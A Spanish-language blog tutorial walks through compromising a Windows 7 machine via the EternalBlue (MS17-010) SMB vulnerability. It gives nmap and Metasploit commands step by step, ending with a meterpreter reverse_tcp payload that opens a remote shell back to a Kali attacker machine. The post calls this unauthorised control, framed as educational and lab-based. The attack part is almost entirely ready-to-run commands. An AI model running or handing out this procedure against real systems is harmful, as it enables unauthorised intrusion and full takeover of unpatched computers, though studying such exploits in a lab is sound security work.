Cómo tomar el control remoto de un ordenador con Windows 7

por 18 Jun 2023Ciberseguridad0 Comentarios

windows 7 hackeado - dryant.com
Compártelo en tus redes sociales. Gracias!

En este tutorial nos haremos con el control de una máquina con windows 7 sin autorización por su parte. Obviamente, esto se debe de hacer sólo con fines educativos, para que podáis ver lo fácil que es hackear un pc con Windows 7 y así tomar las precauciones necesarias para protegeros de los ciberdelincuentes.

Si después de conseguir vulnerar Windows 7 conocéis a alguien que todavía use este sistema operativo, corred a avisarle para que actualice rápidamente su windows a una versión mas reciente.

Para este tutorial necesitamos dos máquinas:

  1. Una máquina con Windows 7 (Máquina víctima)
  2. Una máquina con Kali Linux (Máquina atacante)

El cómo tengáis dichas máquinas es indiferente, pero os pongo ejemplos de como pódeis tener las dos:

  • Un PC con windows 10 u 11, y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
  • Un PC con Kali Linux y una máquina virtual de windows 7
  • Un PC con cualquier otra distribución de Linux y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
  • Un Mac y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7… etc

Para empezar, ejecutamos nuestra máquina virtual con Windows 7 y miramos que ip tiene.

Para ello, lanzamos el cmd (tecla windows y buscamos “cmd”) y escribimos ipconfig

Ahora desde nuestro Kali, seguiremos estos pasos:

Escanear si el puerto de SMB está abierto

Lo primero que tenemos que hacer es ver si el puerto de SMB está abierto:

  1. Lanzamos un nmap para comprobar que tiene el puerto 445 abierto con: (hay que susituir las 3 x por la ip del windows)
nmap -T4 -O 192.168.10.xxx
  1. Esto nos dará entre otros datos si el puerto de SMB está activo o no. Si está activo nos dará una salida similar a esta:

Escanear si el equipo es vulnerable

Una vez hemos visto que el puerto está abierto, veremos si además es vulnerable.

  1. En la terminal abrimos metasploit con el comando que te pongo a continuación.
    msfconsole -q
    Sabremos que hemos entrado en metasploit porque en vez de mostrar la linea de comandos normal, pondrá msf6 > como se ve en la imagen:
  1. Dentro de metasploit, buscamos el exploit que explota esta vulnerabilidad, que se llama eternalblue. Para ello ejecutaremos el comando
    search eternal
    y nos aparecerá algo así:
  1. Ahora ponemos el comando que activa el escaner para saber si el equipo es vulnerable o no:
    use auxiliary/scanner/smb/smb_ms17_010
  2. En el siguiente paso tenemos que elegir el host al que vamos a atacar. En este caso la maquina de windows 7 vulnerable tiene la dirección IP 192.168.1.124 y es la que sacamos en el paso anterior en la máquina de Windows 7 con ipconfig.
    Para elegir el host remoto lo hacemos con el comando:
    set RHOSTS 192.168.1.124
    Recuerda que todos los pasos los estamos haciendo en KALI LINUX
  3. Si ahora ejecutamos el exploit nos dirá si el equipo es vulnerable o no. Lo ejecutamos con el comando:
    exploit
    Solo nos dirá si es vulnerable ya que elegimos el exploit que era un escaner: auxiliary/scanner/smb/smb_ms17_010 Sabremos si es vulnerable si obtenemos este mensaje:

Si nos ha dado que es vulnerable, pasaremos al siguiente paso.

Explotar la vulnerabilidad

Ahora tenemos que seleccionar otro exploit: el que va a explotar la vulnerabilidad.

  1. Para ello volvemos hacia atras para poder salir del auxiliary/scanner… Lo hacemos con el comando: back
  2. Y ahora seleccionamos el exploit eternalblue. Lo seleccionamos con:
    use exploit/windows/smb/ms17_010_eternalblue
  3. Volveremos a elegir el HOST al que vamos a atacar:
    set RHOSTS 192.168.1.124
  4. y elegimos que payload usaremos después de explotar la vulnerabilidad con:
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
  5. Colocamos nuestra ip (la de nuestra máquina con Kali) con: set LHOST 192.168.1.35
  6. y lanzamos el exploit con:
    exploit -j

Una vez hecho esto, tendrás acceso total a windows 7

Compártelo en tus redes sociales. Gracias!
<a href="https://dryant.com/author/dryant/" target="_self">dryant</a>

dryant

Webmaster de dryant.com

Informático, Maker, Inversor amateur, mente inquieta... Me encanta programar, esquiar, aprender, crear, bucear y jugar al baloncesto.

0 comentarios

Enviar un comentario

Tu dirección de correo electrónico no será publicada.

Información básica sobre protección de datos Ver más

  • Responsable: Pedro Blanch Bejarano.
  • Finalidad:  Moderar los comentarios.
  • Legitimación:  Por consentimiento del interesado.
  • Destinatarios y encargados de tratamiento:  No se ceden o comunican datos a terceros para prestar este servicio. El Titular ha contratado los servicios de alojamiento web a IONOS que actúa como encargado de tratamiento.
  • Derechos: Acceder, rectificar y suprimir los datos.
  • Información Adicional: Puede consultar la información detallada en la Política de Privacidad.

¿Quieres acceder a contenido exclusivo?

¿Quieres acceder a contenido exclusivo?

Si te suscribes podrás recibir contenido exclusivo para suscriptores no accesible para el resto de usuarios. Solicita acceso ahora!

Has solicitado el acceso a la suscripción

Esta web utiliza cookies propias y de terceros para su correcto funcionamiento y para fines analíticos y para fines de afiliación y para mostrarte publicidad relacionada con sus preferencias en base a un perfil elaborado a partir de tus hábitos de navegación. Contiene enlaces a sitios web de terceros con políticas de privacidad ajenas que podrás aceptar o no cuando accedas a ellos. Al hacer clic en el botón Aceptar, acepta el uso de estas tecnologías y el procesamiento de tus datos para estos propósitos. Ver Política de cookies
Privacidad